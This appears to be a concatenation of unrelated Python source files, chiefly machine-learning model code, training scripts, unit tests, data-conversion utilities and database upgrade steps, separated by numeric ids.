with pytest.raises(ShapeError):
loss_fn({'imgs': np.ones((3, 5, 2, 1)), 'labels': np.ones((3, 1))},
arg2=np.ones(3), arg3='any') # fails
# yapf: enable
def test_readme_example3():
@check_shapes({'imgs': 'N,W,W,-1', 'labels': 'N,1'}, aux_info=None, out_='')
def loss(batch, aux_info):
# do something with aux_info
diff = (batch['imgs'].mean((1, 2, 3)) - batch['labels'].squeeze())
return np.mean(diff**2)
loss({'imgs': np.ones((3, 2, 2, 1)), 'labels': np.ones((3, 1))}, np.ones(1))
loss({'imgs': np.ones((5, 3, 3, 4)), 'labels': np.ones((5, 1))}, 'any')
with pytest.raises(ShapeError):
loss({'imgs': np.ones((3, 5, 2, 1)), 'labels': np.ones((3, 1))}, 'any')
@pytest.mark.parametrize('inp, out', [(1, 1), (np.array(2), 2), (3, np.array(4)),
(np.array(5), np.array(6))])
def test_scalar_output(inp, out):
@check_shapes(x='', out_='')
def loss_fn(x):
return out
loss_fn(inp)
|
116292
|
import argparse
def dataset(
some_positional_arg,
folder : str = 'default',
):
"""Creates a dataset.
Parameters
----------
some_positional_arg
Some positional argument that gets passed in via the script.
folder : str, optional
Folder for the dataset, by default 'default'
"""
print(folder)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--train_folder', type=str, default='default')
parser.add_argument('--val_folder', type=str, default='default')
parser.add_argument('--test_folder', type=str, default='default')
some_positional_arg = None
args = vars(parser.parse_args())
dataset(some_positional_arg)
dataset(some_positional_arg, args['train_folder'])
dataset(some_positional_arg, args['val_folder'])
dataset(some_positional_arg, args['test_folder'])
|
116324
|
from typing import Dict, List
import pytest
from boardfarm.devices.base_devices.acs_template import AcsTemplate
def test_cannot_instantiate_abc_acs():
with pytest.raises(TypeError) as err:
acs = AcsTemplate() # noqa: F841
print(str(err.value))
assert "Can't instantiate abstract class AcsTemplate" in str(err.value)
def test_cannot_instantiate_derived_acs_missing_model():
with pytest.raises(TypeError) as err:
# missing "model" property definition
class MyAcs(AcsTemplate):
def __init__(self, *args, **kwargs) -> None:
pass
def connect(self, *args, **kwargs) -> None:
pass
def GPV(self, cpe_id: str, parameter: str) -> None:
pass
def SPV(self, cpe_id: str, key_value: List[Dict[str, str]]) -> int:
pass
acs = MyAcs() # noqa: F841
assert "Can't instantiate abstract class MyAcs" in str(err.value)
def test_cannot_instantiate_derived_acs_incorrect_signature():
with pytest.raises(TypeError) as err:
# missing "model" property definition
class MyAcs(AcsTemplate):
model = "unittest"
def __init__(self, *args, **kwargs) -> None:
pass
def connect(self, *args, **kwargs) -> None:
pass
# cpe_id: str param should be present
def GPV(self, parameter: str):
pass
def SPV(self, cpe_id: str, key_value: List[Dict[str, str]]) -> int:
pass
acs = MyAcs() # noqa: F841
assert (
"Abstract method 'GPV' not implemented with correct signature in 'MyAcs'"
in str(err.value)
)
def test_can_instantiate_derived_acs_with_correct_structure():
class MyAcs(AcsTemplate):
model = "unittest"
def __init__(self, *args, **kwargs) -> None:
pass
def connect(self, *args, **kwargs) -> None:
pass
def GPV(self, cpe_id: str, parameter: str) -> None:
pass
def SPV(self, cpe_id: str, key_value: List[Dict[str, str]]) -> int:
pass
acs = MyAcs() # noqa: F841
|
116337
|
import torch
from torch.autograd import Variable
from typing import Dict
from torch.nn import Module, Linear, Dropout, Sequential, Embedding, LogSigmoid, ReLU
from torch.nn.functional import sigmoid, logsigmoid, softmax, normalize, log_softmax
from embeddings.representation import SpanRepresentation
from torch.nn.init import xavier_normal
from embeddings.util import pretrained_embeddings_or_xavier
import numpy as np
from torch.nn.functional import cosine_similarity
def get_type_file(filename, vocab, indxs=False):
data = np.load(filename)
if len(vocab) - data.shape[0] > 0:
if indxs:
data = data + (len(vocab) - data.shape[0])
data = np.concatenate((np.ones((len(vocab) - data.shape[0], data.shape[1]), dtype=data.dtype), data))
return torch.from_numpy(data)
class Pair2Vec(Module):
def __init__(self, config, arg_vocab, rel_vocab):
super(Pair2Vec, self).__init__()
self.config = config
self.arg_vocab = arg_vocab
self.rel_vocab = rel_vocab
self.compositional_rels = config.compositional_rels
self.normalize_pretrained = getattr(config, 'normalize_pretrained', False)
self.separate_mlr = getattr(config, 'separate_mlr', False)
self.positional_rels = getattr(config, 'positional_rels', False)
self.type_scores = get_type_file(config.type_scores_file, arg_vocab).cuda() if hasattr(config, 'type_scores_file') else None
self.type_indices = get_type_file(config.type_indices_file, arg_vocab, indxs=True).cuda() if hasattr(config, 'type_indices_file') else None
self.pad = arg_vocab.stoi['<pad>']
score_fn_str = getattr(config, 'score_function', 'dot_product')
if score_fn_str == 'dot_product':
self.score = (lambda predicted, observed : (predicted * observed).sum(-1))
elif score_fn_str == 'cosine':
self.score = (lambda predicted, observed : cosine_similarity(predicted, observed, dim=1, eps=1e-8))
else:
raise NotImplementedError()
self.num_neg_samples = getattr(config, 'num_neg_samples', 1)
self.num_sampled_relations = getattr(config, 'num_sampled_relations', 1)
self.subword_vocab_file = getattr(config, 'subword_vocab_file', None)
self.loss_weights = [('positive_loss', getattr(config, 'positive_loss', 1.0)),
('negative_rel_loss', getattr(config, 'negative_rel_loss', 1.0)),
('negative_subject_loss', getattr(config, 'negative_subject_loss', 1.0)),
('negative_object_loss', getattr(config, 'negative_object_loss', 1.0))]
if self.type_scores is not None:
self.loss_weights += [('type_subject_loss', getattr(config, 'type_subject_loss', 0.3)), ('type_object_loss', getattr(config, 'type_object_loss', 0.3))]
self.shared_arg_embeddings = getattr(config, 'shared_arg_embeddings', True)
self.represent_arguments = Embedding(config.n_args, config.d_embed)
self.represent_left_argument = lambda x : self.represent_arguments(x)
self.represent_right_argument = (lambda x : self.represent_arguments(x)) if self.shared_arg_embeddings else Embedding(config.n_args, config.d_embed)
if config.compositional_rels:
self.represent_relations = SpanRepresentation(config, config.d_rels, rel_vocab)
else:
raise NotImplementedError()
if config.relation_predictor == 'multiplication':
self.predict_relations = lambda x, y: x * y
elif config.relation_predictor == 'mlp':
self.predict_relations = MLP(config)
else:
raise Exception('Unknown relation predictor: ' + config.relation_predictor)
self.init()
def to_tensors(self, fields):
return ((field, 1.0 - torch.eq(field, self.pad).float()) if (len(field.size()) > 1 and (self.compositional_rels)) else field for field in fields)
def init(self):
for arg_matrix in [self.represent_arguments, self.represent_right_argument]:
if isinstance(arg_matrix, Embedding):
if self.arg_vocab.vectors is not None:
pretrained = normalize(self.arg_vocab.vectors, dim=-1) if self.normalize_pretrained else self.arg_vocab.vectors
arg_matrix.weight.data[:, :pretrained.size(1)].copy_(pretrained)
print('Copied pretrained vecs for argument matrix')
else:
arg_matrix.reset_parameters()
def forward(self, batch):
if len(batch) == 4:
batch = batch + (None, None)
subjects, objects, observed_relations, sampled_relations, sampled_subjects, sampled_objects = batch
sampled_relations = sampled_relations.view(-1, observed_relations.size(1), 1).squeeze(-1)
subjects, objects = self.to_tensors((subjects, objects))
embedded_subjects = self.represent_left_argument(subjects)
embedded_objects = self.represent_right_argument(objects)
predicted_relations = self.predict_relations(embedded_subjects, embedded_objects)
observed_relations, sampled_relations = self.to_tensors((observed_relations, sampled_relations))
observed_relations = self.represent_relations(observed_relations)
sampled_relations = self.represent_relations(sampled_relations)
# score = lambda predicted, observed : (predicted * observed).sum(-1)
rep_observed_relations = observed_relations.repeat(self.num_sampled_relations, 1)
rep_predicted_relations = predicted_relations.repeat(self.num_sampled_relations, 1)
pos_rel_scores, neg_rel_scores = self.score(predicted_relations, observed_relations), self.score(rep_predicted_relations, sampled_relations)
output_dict = {}
output_dict['positive_loss'] = -logsigmoid(pos_rel_scores).sum()
output_dict['negative_rel_loss'] = -logsigmoid(-neg_rel_scores).sum()
# fake pair loss
if sampled_subjects is not None and sampled_objects is not None:
# sampled_subjects, sampled_objects = self.to_tensors((sampled_subjects, sampled_objects))
sampled_subjects, sampled_objects = sampled_subjects.view(-1, 1).squeeze(-1), sampled_objects.view(-1, 1).squeeze(-1)
sampled_subjects, sampled_objects = self.represent_left_argument(sampled_subjects), self.represent_right_argument(sampled_objects)
rep_embedded_objects, rep_embedded_subjects = embedded_objects.repeat(self.num_neg_samples, 1), embedded_subjects.repeat(self.num_neg_samples, 1)
pred_relations_for_sampled_sub = self.predict_relations(sampled_subjects, rep_embedded_objects)
pred_relations_for_sampled_obj = self.predict_relations(rep_embedded_subjects, sampled_objects)
rep_observed_relations = observed_relations.repeat(self.num_neg_samples, 1)
output_dict['negative_subject_loss'] = -logsigmoid(-self.score(pred_relations_for_sampled_sub, rep_observed_relations)).sum() #/ self.num_neg_samples
output_dict['negative_object_loss'] = -logsigmoid(-self.score(pred_relations_for_sampled_obj, rep_observed_relations)).sum() #/ self.num_neg_samples
if self.type_scores is not None:
# loss_weights += [('type_subject_loss', 0.3), ('type_object_loss', 0.3)]
method = 'uniform'
type_sampled_subjects, type_sampled_objects = self.get_type_sampled_arguments(subjects, method), self.get_type_sampled_arguments(objects, method)
type_sampled_subjects, type_sampled_objects = self.represent_left_argument(type_sampled_subjects), self.represent_right_argument(type_sampled_objects)
pred_relations_for_type_sampled_sub = self.predict_relations(type_sampled_subjects, embedded_objects)
pred_relations_for_type_sampled_obj = self.predict_relations(embedded_subjects, type_sampled_objects)
output_dict['type_subject_loss'] = -logsigmoid(-self.score(pred_relations_for_type_sampled_sub, observed_relations)).sum()
output_dict['type_object_loss'] = -logsigmoid(-self.score(pred_relations_for_type_sampled_obj, observed_relations)).sum()
loss = 0.0
for loss_name, weight in self.loss_weights:
loss += weight * output_dict[loss_name]
output_dict['observed_probabilities'] = sigmoid(pos_rel_scores)
output_dict['sampled_probabilities'] = sigmoid(neg_rel_scores)
return predicted_relations, loss, output_dict
def get_type_sampled_arguments(self, arguments, method='uniform'):
argument_indices = torch.index_select(self.type_indices, 0, arguments.data)
if method == 'unigram':
argument_scores = torch.index_select(self.type_scores, 0, arguments.data)
sampled_idx_idxs = torch.multinomial(argument_scores, 1, replacement=True).squeeze(1).cuda()
sampled_idxs = torch.gather(argument_indices, 1, sampled_idx_idxs.unsqueeze(1)).squeeze(1)
else:
# sampled_idx_idxs = torch.randint(0, self.type_scores.size(1), size=arguments.size(0), replacement=True)
sampled_idx_idxs = torch.LongTensor(arguments.size(0)).random_(0, self.type_scores.size(1)).cuda()
sampled_idxs = torch.gather(argument_indices, 1, sampled_idx_idxs.unsqueeze(1)).squeeze(1)
return Variable(sampled_idxs, requires_grad=False)
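    # NOTE (added): this method is shadowed by the `self.score` lambda assigned
    # in __init__, so the bmm-based implementation below is effectively unused.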
def score(self, predicted, observed):
return torch.bmm(predicted.unsqueeze(1), observed.unsqueeze(2)).squeeze(-1).squeeze(-1)
class MLP(Module):
def __init__(self, config):
super(MLP, self).__init__()
self.dropout = Dropout(p=config.dropout)
self.nonlinearity = ReLU()
self.normalize = normalize if getattr(config, 'normalize_args', False) else (lambda x : x)
layers = getattr(config, "mlp_layers", 4)
if layers == 2:
self.mlp = Sequential(self.dropout, Linear(3 * config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_rels))
elif layers == 3:
self.mlp = Sequential(self.dropout, Linear(3 * config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_rels))
elif layers == 4:
self.mlp = Sequential(self.dropout, Linear(3 * config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_args), self.nonlinearity, self.dropout, Linear(config.d_args, config.d_rels))
else:
raise NotImplementedError()
def forward(self, subjects, objects):
subjects = self.normalize(subjects)
objects = self.normalize(objects)
return self.mlp(torch.cat([subjects, objects, subjects * objects], dim=-1))
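if __name__ == '__main__':
    # Hedged smoke test (added for illustration): exercises the MLP relation
    # predictor in isolation. The config object is a stand-in; only the
    # attribute names read by MLP above (dropout, d_args, d_rels, mlp_layers)
    # come from the code, the values are arbitrary.
    from types import SimpleNamespace
    cfg = SimpleNamespace(dropout=0.1, d_args=300, d_rels=300, mlp_layers=2)
    mlp = MLP(cfg)
    out = mlp(torch.randn(8, 300), torch.randn(8, 300))
    print(out.shape)  # torch.Size([8, 300])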
|
116352
|
from __future__ import unicode_literals
from __future__ import absolute_import, division, print_function
"""
Value mapper for Identifier (URI/CURIE) field
"""
__author__ = "<NAME> (<EMAIL>)"
__copyright__ = "Copyright 2017, <NAME>"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import logging
log = logging.getLogger(__name__)
from utils.py3porting import is_string, to_unicode
from annalist.views.fields.render_base import RenderBase
# ----------------------------------------------------------------------------
#
# Identifier value mapping
#
# ----------------------------------------------------------------------------
class IdentifierValueMapper(RenderBase):
"""
Value mapper class for entity id field.
"""
@classmethod
def decode(cls, field_value):
"""
Returns an Identifier (URI/CURIE) form field value with leading/trailing spaces trimmed
"""
if is_string(field_value):
field_value = field_value.strip()
return field_value
    # encode defaults to identity mapper
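    # Illustrative behaviour (added note, not part of the original module):
    #   IdentifierValueMapper.decode("  ex:Identifier  ") -> "ex:Identifier"
    #   non-string values (e.g. None) are returned unchanged.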
# End.
|
116398
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import json
import os
import argparse
import numpy as np
import torch.optim as optim
import torch.nn as nn
from torch.utils.data import DataLoader
from datetime import datetime
from collections import defaultdict
from tensorboardX import SummaryWriter
from skimage.transform import pyramid_expand
from tqdm import tqdm
from Utils import utils
from DataProvider import cityscapes
from Models.Poly import polyrnnpp
from Evaluation import losses, metrics
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--exp', type=str)
parser.add_argument('--resume', type=str)
args = parser.parse_args()
return args
def get_data_loaders(opts, DataProvider):
    print('Building dataloaders')
dataset_train = DataProvider(split='train', opts=opts['train'])
dataset_val = DataProvider(split='train_val', opts=opts['train_val'])
train_loader = DataLoader(dataset_train, batch_size=opts['train']['batch_size'],
shuffle=False, num_workers=opts['train']['num_workers'], collate_fn=cityscapes.collate_fn)
val_loader = DataLoader(dataset_val, batch_size=opts['train_val']['batch_size'],
shuffle=False, num_workers=opts['train_val']['num_workers'], collate_fn=cityscapes.collate_fn)
return train_loader, val_loader
class Trainer(object):
def __init__(self, args):
self.global_step = 0
self.epoch = 0
self.opts = json.load(open(args.exp, 'r'))
utils.create_folder(os.path.join(self.opts['exp_dir'], 'checkpoints'))
# Copy experiment file
os.system('cp %s %s' % (args.exp, self.opts['exp_dir']))
self.writer = SummaryWriter(os.path.join(self.opts['exp_dir'], 'logs', 'train'))
self.val_writer = SummaryWriter(os.path.join(self.opts['exp_dir'], 'logs', 'train_val'))
self.train_loader, self.val_loader = get_data_loaders(self.opts['dataset'], cityscapes.DataProvider)
self.model = polyrnnpp.PolyRNNpp(self.opts).to(device)
if 'xe_initializer' in self.opts.keys():
self.model.reload(self.opts['xe_initializer'])
elif 'encoder_reload' in self.opts.keys():
self.model.encoder.reload(self.opts['encoder_reload'])
# set
self.model.encoder.eval()
self.model.first_v.eval()
self.model.evaluator.eval()
# OPTIMIZER
no_wd = []
wd = []
        print('Weight Decay applied to: ')
for name, p in self.model.named_parameters():
if not p.requires_grad:
# No optimization for frozen params
continue
if 'bn' in name or 'conv_lstm' in name or 'bias' in name:
no_wd.append(p)
else:
wd.append(p)
                print(name, end=' ')
# Allow individual options
self.optimizer = optim.Adam(
[
{'params': no_wd, 'weight_decay': 0.0},
{'params': wd}
],
lr=self.opts['lr'],
weight_decay=self.opts['weight_decay'],
amsgrad=False)
# TODO: Test how amsgrad works (On the convergence of Adam and Beyond)
self.lr_decay = optim.lr_scheduler.StepLR(self.optimizer, step_size=self.opts['lr_decay'],
gamma=0.1)
if args.resume is not None:
self.resume(args.resume)
def save_checkpoint(self, epoch):
save_state = {
'epoch': epoch,
'global_step': self.global_step,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'lr_decay': self.lr_decay.state_dict()
}
save_name = os.path.join(self.opts['exp_dir'], 'checkpoints', 'epoch%d_step%d.pth' \
% (epoch, self.global_step))
torch.save(save_state, save_name)
        print('Saved model')
def resume(self, path):
self.model.reload(path)
save_state = torch.load(path, map_location=lambda storage, loc: storage)
self.global_step = save_state['global_step']
self.epoch = save_state['epoch']
self.optimizer.load_state_dict(save_state['optimizer'])
self.lr_decay.load_state_dict(save_state['lr_decay'])
def loop(self):
for epoch in range(self.epoch, self.opts['max_epochs']):
self.save_checkpoint(epoch)
self.lr_decay.step()
            print('LR is now: ', self.optimizer.param_groups[0]['lr'])
self.train(epoch)
def train(self, epoch):
        print('Starting training')
self.model.temperature = self.opts['temperature']
self.model.ggnn.encoder.train()
accum = defaultdict(float)
# To accumulate stats for printing
ggnn_grid_size = self.opts['ggnn_grid_size']
for step, data in enumerate(self.train_loader):
self.optimizer.zero_grad()
if self.global_step % self.opts['val_freq'] == 0:
self.validate()
self.save_checkpoint(epoch)
output = self.model(data['img'].to(device), data['fwd_poly'].to(device), orig_poly=data['orig_poly'])
ggnn_logits = output['ggnn_logits']
local_prediction = output['ggnn_local_prediction'].to(device)
poly_masks = output['ggnn_mask'].to(device)
pred_polys = output['pred_polys'].data.numpy()
loss_sum = losses.poly_vertex_loss_mle_ggnn(local_prediction,
poly_masks,
ggnn_logits)
loss_sum.backward()
if 'grad_clip' in self.opts.keys():
nn.utils.clip_grad_norm_(self.model.ggnn.parameters(), self.opts['grad_clip'])
self.optimizer.step()
with torch.no_grad():
# Get IoU
iou = 0
orig_poly = data['orig_poly']
for i in range(pred_polys.shape[0]):
p = pred_polys[i]
mask_poly = utils.get_masked_poly(p, self.model.ggnn.ggnn_grid_size)
mask_poly = utils.class_to_xy(mask_poly, self.model.ggnn.ggnn_grid_size)
curr_gt_poly_112 = utils.poly01_to_poly0g(orig_poly[i], ggnn_grid_size)
cur_iou, masks = metrics.iou_from_poly(np.array(mask_poly, dtype=np.int32),
np.array(curr_gt_poly_112, dtype=np.int32),
ggnn_grid_size,
ggnn_grid_size)
iou += cur_iou
iou = iou / pred_polys.shape[0]
accum['loss'] += float(loss_sum.item())
accum['iou'] += iou
accum['length'] += 1
if step % self.opts['print_freq'] == 0:
# Mean of accumulated values
for k in accum.keys():
if k == 'length':
continue
accum[k] /= accum['length']
# Add summaries
masks = np.expand_dims(masks, -1).astype(np.uint8) # Add a channel dimension
masks = np.tile(masks, [1, 1, 1, 3]) # Make [2, H, W, 3]
img = (data['img'].cpu().numpy()[-1, ...] * 255).astype(np.uint8)
img = np.transpose(img, [1, 2, 0]) # Make [H, W, 3]
self.writer.add_image('pred_mask', masks[0], self.global_step)
self.writer.add_image('gt_mask', masks[1], self.global_step)
self.writer.add_image('image', img, self.global_step)
for k in accum.keys():
if k == 'length':
continue
self.writer.add_scalar(k, accum[k], self.global_step)
print(
"[%s] Epoch: %d, Step: %d, Polygon Loss: %f, IOU: %f" \
% (str(datetime.now()), epoch, self.global_step, accum['loss'], accum['iou']))
accum = defaultdict(float)
del (output, local_prediction, poly_masks, masks, ggnn_logits, pred_polys, loss_sum)
self.global_step += 1
def validate(self):
        print('Validating')
ggnn_grid_size = self.opts['ggnn_grid_size']
self.model.ggnn.encoder.eval()
self.model.temperature = 0
self.model.mode = "test"
# Leave LSTM in train mode
with torch.no_grad():
ious = []
for step, data in enumerate(tqdm(self.val_loader)):
output = self.model(data['img'].to(device), data['fwd_poly'].to(device))
pred_polys = output['pred_polys'].data.numpy()
# Get IoU
iou = 0
orig_poly = data['orig_poly']
for i in range(pred_polys.shape[0]):
p = pred_polys[i]
mask_poly = utils.get_masked_poly(p, self.model.ggnn.ggnn_grid_size)
mask_poly = utils.class_to_xy(mask_poly, self.model.ggnn.ggnn_grid_size)
curr_gt_poly_112 = utils.poly01_to_poly0g(orig_poly[i], ggnn_grid_size)
                    cur_iou, masks = metrics.iou_from_poly(np.array(mask_poly, dtype=np.int32),
                                                           np.array(curr_gt_poly_112, dtype=np.int32), ggnn_grid_size, ggnn_grid_size)
                    iou += cur_iou
iou = iou / pred_polys.shape[0]
ious.append(iou)
del (output)
del (pred_polys)
iou = np.mean(ious)
self.val_writer.add_scalar('iou', float(iou), self.global_step)
            print('[VAL] IoU: %f' % iou)
self.model.temperature = self.opts['temperature']
self.model.mode = "train_ggnn"
self.model.ggnn.encoder.train()
if __name__ == '__main__':
args = get_args()
trainer = Trainer(args)
trainer.loop()
|
116426
|
import nltk
from operator import itemgetter
class Argument:
def __init__(self, arg):
self.words = [x for x in arg[0].strip().split(' ') if x]
self.posTags = list(map(itemgetter(1), nltk.pos_tag(self.words)))
self.indices = arg[1]
self.feats = {}
COREF = 'coref'
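if __name__ == '__main__':
    # Hedged usage sketch (added for illustration): requires the NLTK
    # 'averaged_perceptron_tagger' data to be available locally.
    arg = Argument(("the quick brown fox", [0, 1, 2, 3]))
    print(arg.words)    # ['the', 'quick', 'brown', 'fox']
    print(arg.posTags)  # e.g. ['DT', 'JJ', 'NN', 'NN']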
|
116456
|
from dataclasses import dataclass
from typing import Tuple, List
import ase.data
import numpy as np
from networkx import Graph
from rdkit import Chem
import graphdg.parse.tools as tools
from graphdg.parse.extended_graph import mol_to_extended_graph
from graphdg.tools import GLOBALS, NODES, EDGES, SENDERS, RECEIVERS, to_one_hot
# Elements
SYMBOLS = ase.data.chemical_symbols[1:10]
SYMBOL_TO_OH = {symbol: to_one_hot(index=index, num_classes=len(SYMBOLS)) for index, symbol in enumerate(SYMBOLS)}
# Rings
MAX_RING_SIZE = 9
RING_SIZES = range(3, MAX_RING_SIZE + 1)
NOT_IN_RING = tuple(0 for _ in RING_SIZES)
# Edges
EDGE_KINDS = [1, 2, 3]
EDGE_KIND_TO_OH = {
edge_kind: to_one_hot(index=index, num_classes=len(EDGE_KINDS))
for index, edge_kind in enumerate(EDGE_KINDS)
}
# Bond type
BOND_TYPES = [
Chem.BondType.ZERO, Chem.BondType.SINGLE, Chem.BondType.DOUBLE, Chem.BondType.TRIPLE, Chem.BondType.AROMATIC
]
BOND_TYPE_TO_OH = {
bond_type: to_one_hot(index=index, num_classes=len(BOND_TYPES))
for index, bond_type in enumerate(BOND_TYPES)
}
# Stereo
STEREO_TYPES = [Chem.BondStereo.STEREONONE, Chem.BondStereo.STEREOANY, Chem.BondStereo.STEREOE, Chem.BondStereo.STEREOZ]
STEREO_TYPE_TO_OH = {
stereo_type: to_one_hot(index=index, num_classes=len(STEREO_TYPES))
for index, stereo_type in enumerate(STEREO_TYPES)
}
# Chirality
CHI_TAGS = [Chem.CHI_UNSPECIFIED, Chem.CHI_TETRAHEDRAL_CW, Chem.CHI_TETRAHEDRAL_CCW]
CHI_TAGS_TO_OH = {chi_tag: to_one_hot(index=index, num_classes=len(CHI_TAGS)) for index, chi_tag in enumerate(CHI_TAGS)}
@dataclass
class NodeInfo:
symbol: str
chiral_tag: int
def to_features(self) -> List:
return SYMBOL_TO_OH[self.symbol] + CHI_TAGS_TO_OH[self.chiral_tag]
@dataclass
class EdgeInfo:
distance: float
atom_ids: Tuple[int, int]
kind: int
stereo: int = Chem.BondStereo.STEREONONE
bond_type: int = Chem.BondType.ZERO
is_aromatic: bool = False
is_conjugated: bool = False
is_in_ring_size: Tuple[int, ...] = NOT_IN_RING
def to_features(self) -> Tuple[Tuple, List[int], float]:
feats = EDGE_KIND_TO_OH[self.kind] + STEREO_TYPE_TO_OH[self.stereo] + BOND_TYPE_TO_OH[self.bond_type] + [
int(self.is_aromatic), int(self.is_conjugated)
] + list(self.is_in_ring_size)
return self.atom_ids, feats, self.distance
def get_node_infos(molecule: Chem.Mol) -> List[NodeInfo]:
return [
NodeInfo(
symbol=ase.data.chemical_symbols[atom.GetAtomicNum()],
chiral_tag=atom.GetChiralTag(),
) for atom in molecule.GetAtoms()
]
def get_edge_infos(molecule: Chem.Mol, graph: Graph):
edge_infos = []
for (source, sink) in graph.edges:
kind = graph.edges[(source, sink)]['kind']
if kind == 1:
bond = molecule.GetBondBetweenAtoms(source, sink)
edge_info = EdgeInfo(
distance=tools.get_atom_distance(molecule, source, sink),
atom_ids=(source, sink),
kind=kind,
stereo=bond.GetStereo(),
bond_type=bond.GetBondType(),
is_aromatic=bond.GetIsAromatic(),
is_conjugated=bond.GetIsConjugated(),
is_in_ring_size=tuple(int(bond.IsInRingSize(size)) for size in RING_SIZES),
)
else:
edge_info = EdgeInfo(
distance=tools.get_atom_distance(molecule, source, sink),
atom_ids=(source, sink),
kind=kind,
)
edge_infos.append(edge_info)
return edge_infos
def get_feats_and_targets(node_infos: List[NodeInfo], edge_infos: List[EdgeInfo]) -> Tuple[dict, np.ndarray]:
nodes = [node_info.to_features() for node_info in node_infos]
edges = []
senders = []
receivers = []
targets = []
for edge_info in edge_infos:
(sender, receiver), edge_feats, distance = edge_info.to_features()
# Forward
edges.append(edge_feats)
senders.append(sender)
receivers.append(receiver)
targets.append([distance])
# Reverse
edges.append(edge_feats)
senders.append(receiver)
receivers.append(sender)
targets.append([distance])
assert (len(edges) == len(senders) == len(receivers) == len(targets))
feats = {
        GLOBALS: np.array([], dtype=float),
        NODES: np.array(nodes, dtype=float),
        EDGES: np.array(edges, dtype=float),
        SENDERS: np.array(senders, dtype=int),
        RECEIVERS: np.array(receivers, dtype=int),
    }
    targets = np.array(targets, dtype=float)
return feats, targets
def get_info_tuple(molecule: Chem.Mol, seed: int) -> Tuple[List[NodeInfo], List[EdgeInfo]]:
atom_infos = get_node_infos(molecule)
graph = mol_to_extended_graph(molecule, seed=seed)
edge_infos = get_edge_infos(molecule=molecule, graph=graph)
return atom_infos, edge_infos
def get_dataset(molecules: List[Chem.Mol], seed: int, count: int) -> List[Tuple[dict, np.ndarray]]:
dataset = []
for mol_id, molecule in enumerate(molecules):
for index in range(count):
node_infos, edge_infos = get_info_tuple(molecule, seed=seed + mol_id + index)
feats_targets = get_feats_and_targets(node_infos=node_infos, edge_infos=edge_infos)
dataset.append(feats_targets)
return dataset
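# Hedged usage sketch (added for illustration; 'conformers.sdf' is a
# hypothetical input file of molecules with 3D coordinates):
#   suppl = Chem.SDMolSupplier('conformers.sdf', removeHs=False)
#   dataset = get_dataset([m for m in suppl if m is not None], seed=0, count=1)
#   feats, targets = dataset[0]  # graph-dict features and per-edge distances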
|
116489
|
from zisan.Seg.Interface import ImgSeg, markTools
import os
import numpy as np
import cv2
from PIL import Image
current_path = os.path.dirname(__file__)
lines=[[(281,120),(267,341)],[(279,157),(208,171)],[(309,170),(308,250)],[(275,233),(370,341)]]
model=ImgSeg(current_path+'/Jintu_SEG_Interactive.pth')
img=Image.open(current_path+'/temp/1.jpg').convert('RGB')
markpen=markTools(img.height,img.width)
for line in lines:
markpen.curveDraw(line,is_Pos=True)
re=markpen.getMark_result(is_showPreview=True)
model.ImgSeg_SingleObj(img,re,is_showPreview=True)
|
116504
|
import uuid
import os
def unique_upload(instance, filename):
ext = filename.split('.').pop()
return "{}.{}".format(uuid.uuid4(), ext)
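if __name__ == "__main__":
    # Hedged usage sketch (added): Django calls upload_to callables as
    # upload_to(instance, filename); the instance is unused here.
    print(unique_upload(None, "avatar.png"))  # e.g. '9f1c2e64-....png'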
|
116507
|
import argparse
from pathlib import Path
import shutil
from sphfile import SPHFile
parser = argparse.ArgumentParser()
parser.add_argument("src_dir")
parser.add_argument("dest_dir")
args = parser.parse_args()
src = Path(args.src_dir)
dest = Path(args.dest_dir)
for file_sph in (src / "sph").iterdir():
file_stm = src / "stm" / file_sph.name.replace(".sph", ".stm")
dest.mkdir(parents=True, exist_ok=True)
sph = SPHFile(str(file_sph))
sph.write_wav(str(dest / file_sph.name.replace(".sph", ".wav")))
with open(file_stm, "r") as f:
output = []
ground_truth = []
for line in f.readlines():
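            # Added note: NIST STM lines have the form
            #   <file> <channel> <speaker> <start> <end> <label> transcript...
            # so parts[3] and parts[4] are the segment times and parts[6:] is the transcript.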
line_parts = line.split()
line = " ".join(line_parts[6:])
if line != "ignore_time_segment_in_scoring":
output.append(line)
ground_truth.append(" ".join([line_parts[3], line_parts[4]] + line_parts[6:]))
with open(str(dest / file_sph.name.replace(".sph", ".txt")), "w") as f:
f.write("\n".join(output))
with open(str(dest / file_sph.name.replace(".sph", "_ground_truth.txt")), "w") as f:
f.write("\n".join(ground_truth))
|
116515
|
from snovault import (
upgrade_step,
)
@upgrade_step('workflow_run_awsem', '1', '2')
@upgrade_step('workflow_run_sbg', '1', '2')
@upgrade_step('workflow_run', '1', '2')
def workflow_run_1_2(value, system):
'''Change input_files.format_if_extra to FileFormat'''
formats = system['registry']['collections']['FileFormat']
input_files = value.get('input_files', [])
for i, infile in enumerate(input_files):
if 'format_if_extra' not in infile:
continue
eformat_item = formats.get(infile['format_if_extra'])
efuuid = None
try:
efuuid = str(eformat_item.uuid)
except AttributeError:
pass
if not efuuid:
msg = 'EXTRA_FILE_FORMAT: %s NOT FOUND' % infile['format_if_extra']
note = value['input_files'][i].get('notes', '')
msg = ' '.join([note, msg])
value['input_files'][i]['notes'] = msg
del value['input_files'][i]['format_if_extra']
else:
value['input_files'][i]['format_if_extra'] = efuuid
@upgrade_step('workflow_run_awsem', '2', '3')
@upgrade_step('workflow_run_sbg', '2', '3')
@upgrade_step('workflow_run', '2', '3')
def workflow_run_2_3(value, system):
if 'output_quality_metrics' in value:
del value['output_quality_metrics']
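# Hedged illustration (added; not part of the upgrade module): workflow_run_1_2
# rewrites each input file's format_if_extra from a FileFormat name to its uuid
# when the format is registered, e.g.
#   before: {'input_files': [{'format_if_extra': 'pairs'}]}
#   after:  {'input_files': [{'format_if_extra': '<uuid of the pairs FileFormat>'}]}
# unresolvable names are recorded in 'notes' and the field is dropped.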
|
116544
|
import os
import time
import logging
import unittest
import binascii
import contextlib
import dissect.formats.mbr as mbr
import dissect.formats.fat32 as fat32
